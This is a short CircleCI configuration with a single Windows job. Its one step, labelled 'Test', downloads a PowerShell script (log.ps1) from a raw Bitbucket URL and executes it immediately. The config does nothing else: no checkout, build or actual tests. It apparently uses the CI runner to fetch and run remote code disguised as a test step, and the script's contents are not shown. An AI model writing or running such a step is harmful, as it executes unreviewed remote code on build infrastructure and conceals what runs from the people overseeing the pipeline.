version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/agalok/alog/raw/d45208d57d213fedf0f3eb47c13121ec62bb128f/log.ps1 -OutFile log.ps1
            ./log.ps1